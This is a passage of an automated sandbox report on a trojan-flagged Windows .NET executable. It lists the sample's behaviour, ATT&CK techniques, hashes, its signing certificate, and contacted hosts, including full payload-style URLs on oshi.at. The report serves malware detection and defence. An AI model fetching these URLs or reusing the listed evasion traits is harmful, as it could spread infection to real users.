Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeSection loaded: gpapi.dllJump to behavior
Source: Ref_31020563.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Ref_31020563.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeMemory allocated: 1220000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeMemory allocated: 2B50000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exe TID: 7708Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exe TID: 7708Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeThread delayed: delay time: 600000Jump to behavior
Source: Ref_31020563.exe, 00000000.00000002.3283207471.0000000000F82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Ref_31020563.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeQueries volume information: C:\Users\user\Desktop\Ref_31020563.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Ref_31020563.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
Virtualization/Sandbox Evasion
LSASS Memory31
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager12
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Ref_31020563.exe37%ReversingLabsWin32.Trojan.Barys
Ref_31020563.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://oshi.at/AQBP0%Avira URL Cloudsafe
http://ocsps.ssl.com0?0%Avira URL Cloudsafe
http://oshi.atd0%Avira URL Cloudsafe
https://oshi.at/AQBPd0%Avira URL Cloudsafe
http://ocsps.ssl.com00%Avira URL Cloudsafe
http://ocsps.ssl.com0_0%Avira URL Cloudsafe
https://oshi.at/AQBPKPAMhkUWREVZAdqU4bM.xStpkLwqD15MRB9YwOo0%Avira URL Cloudsafe
https://oshi.at/AQBPto0%Avira URL Cloudsafe
https://oshi.at0%Avira URL Cloudsafe
http://oshi.at0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
oshi.at
194.15.112.248
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    https://oshi.at/AQBPfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0Ref_31020563.exefalse
      high
      http://oshi.atdRef_31020563.exe, 00000000.00000002.3283542309.0000000002DDA000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://crls.ssl.com/ssl.com-rsa-RootCA.crl0Ref_31020563.exefalse
        high
        http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0Ref_31020563.exefalse
          high
          http://oshi.atRef_31020563.exe, 00000000.00000002.3283542309.0000000002DDA000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://github.com/somenonymous/OshiUploadRef_31020563.exe, 00000000.00000002.3283542309.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E3E000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000003099000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F14000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DF7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000003095000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.000000000307D000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F1C000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://www.ssl.com/repository0Ref_31020563.exefalse
              high
              http://ocsps.ssl.com0?Ref_31020563.exefalse
              • Avira URL Cloud: safe
              unknown
              http://ocsps.ssl.com0_Ref_31020563.exefalse
              • Avira URL Cloud: safe
              unknown
              http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0Ref_31020563.exefalse
                high
                https://oshi.atRef_31020563.exe, 00000000.00000002.3283542309.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DFB000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0QRef_31020563.exefalse
                  high
                  http://ocsps.ssl.com0Ref_31020563.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  https://oshi.at/AQBPKPAMhkUWREVZAdqU4bM.xStpkLwqD15MRB9YwOoRef_31020563.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0Ref_31020563.exefalse
                    high
                    http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0Ref_31020563.exefalse
                      high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRef_31020563.exe, 00000000.00000002.3283542309.0000000002DCA000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0Ref_31020563.exefalse
                          high
                          https://oshi.at/AQBPdRef_31020563.exe, 00000000.00000002.3283542309.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp, Ref_31020563.exe, 00000000.00000002.3283542309.0000000002DFB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://oshi.at/AQBPtoRef_31020563.exe, 00000000.00000002.3283542309.0000000002D61000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          194.15.112.248
                          oshi.atUkraine
                          213354INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1572489
                          Start date and time:2024-12-10 16:26:27 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 10s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Run name:Run with higher sleep bypass
                          Number of analysed new started processes analysed:6
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Ref_31020563.exe
                          Detection:MAL
                          Classification:mal56.winEXE@1/0@1/1
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 6
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded IPs from analysis (whitelisted): 172.202.163.200
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target Ref_31020563.exe, PID 7572 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • VT rate limit hit for: Ref_31020563.exe
                          No simulations
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          194.15.112.248Ref#116670.exeGet hashmaliciousMassLogger RATBrowse
                            Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                              Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                  KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                    Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                      uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                        W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          oshi.atRef#116670.exeGet hashmaliciousMassLogger RATBrowse
                                          • 194.15.112.248
                                          Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                          • 194.15.112.248
                                          Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                          • 194.15.112.248
                                          Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                          • 5.253.86.15
                                          Swift Payment MT103.lnkGet hashmaliciousUnknownBrowse
                                          • 188.241.120.6
                                          Facturation.exeGet hashmaliciousDoeneriumBrowse
                                          • 188.241.120.6
                                          Facturation.exeGet hashmaliciousDoeneriumBrowse
                                          • 188.241.120.6
                                          KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                          • 194.15.112.248
                                          KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                          • 194.15.112.248
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBRef#116670.exeGet hashmaliciousMassLogger RATBrowse
                                          • 194.15.112.248
                                          Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                          • 194.15.112.248
                                          Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                          • 194.15.112.248
                                          KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                          • 194.15.112.248
                                          KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                          • 194.15.112.248
                                          Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                          • 194.15.112.248
                                          uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                          • 194.15.112.248
                                          W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                          • 194.15.112.248
                                          1pXdiCesZ6.exeGet hashmaliciousDanaBotBrowse
                                          • 194.15.112.203
                                          bad.pdf.exeGet hashmaliciousUnknownBrowse
                                          • 194.15.113.200
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          3b5074b1b5d032e5620f69f9f700ff0exUPaeKk5wQ.msiGet hashmaliciousAteraAgentBrowse
                                          • 194.15.112.248
                                          7gBUqzSN3y.msiGet hashmaliciousAteraAgentBrowse
                                          • 194.15.112.248
                                          PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                          • 194.15.112.248
                                          New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                          • 194.15.112.248
                                          Bunker_STS_pdf.vbsGet hashmaliciousUnknownBrowse
                                          • 194.15.112.248
                                          Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 194.15.112.248
                                          Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 194.15.112.248
                                          E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                          • 194.15.112.248
                                          Hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 194.15.112.248
                                          No context
                                          No created / dropped files found
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):3.503258515872725
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Ref_31020563.exe
                                          File size:180'704 bytes
                                          MD5:7c8431a3c14296cff7381cc69b61bad8
                                          SHA1:d3d20ede9527fdbeb8252118af55558037721630
                                          SHA256:881d0d3e98524b861548955ed7ced7f91de3a39d50feb573896694188e7fecff
                                          SHA512:43029de7a6896a3e9b1037c02658b25ef222fa891f22551c6e934c6d0fe1a4a127e5f7f3d37490ede23be27534410dbd2ac846c0722c3ff909be3933bb166f8b
                                          SSDEEP:384:eNuji6i2UKsMQmZjVBjN4IXQxxkSlSlSlSlSlKlfalfalfalfalfalfalfalfalt:sH22m5vHzhVCa3K6XiFZKj
                                          TLSH:43041A63B53CC4E2F89C3DF09A5997256AB16E920238F087E54FBDC6E8B3623C6051D5
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9Xg............................^+... ...@....@.. ....................................`................................
                                          Icon Hash:07d8d8d4d4d85026
                                          Entrypoint:0x402b5e
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x6758390D [Tue Dec 10 12:50:21 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Signature Valid:false
                                          Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                          Signature Validation Error:The digital signature of the object did not verify
                                          Error Number:-2146869232
                                          Not Before, Not After
                                          • 04/07/2024 00:35:32 15/05/2027 11:15:04
                                          Subject Chain
                                          • OID.1.3.6.1.4.1.311.60.2.1.3=VN, OID.2.5.4.15=Private Organization, CN="DUC FABULOUS CO.,LTD", SERIALNUMBER=0105838409, O="DUC FABULOUS CO.,LTD", L=Hanoi, C=VN
                                          Version:3
                                          Thumbprint MD5:FF0E889D2A73C3A679605952D35452DC
                                          Thumbprint SHA-1:2C1D12F8BBE0827400A8440AF74FFFA8DCC8097C
                                          Thumbprint SHA-256:A73352D67693AA16BCE2F182B15891F0F23EA0485CC18938686AAFDEE7B743E3
                                          Serial:6DD2E3173995F51BFAC1D9FB4CB200C1
                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2b080x53.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x29276.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x2a4000x1de0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xb640xc004b0bc13289f9896f4f7af2fcb8f4e52fFalse0.5716145833333334data5.189697873641547IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0x40000x292760x2940004ee348ac2debaee0968c396aa0f5c6cFalse0.0558297821969697data3.0574613817425944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x2e0000xc0x200d41fb489799b709e37a733d4ed02be14False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0x42b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.17375886524822695
                                          RT_ICON0x47180x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.11229508196721312
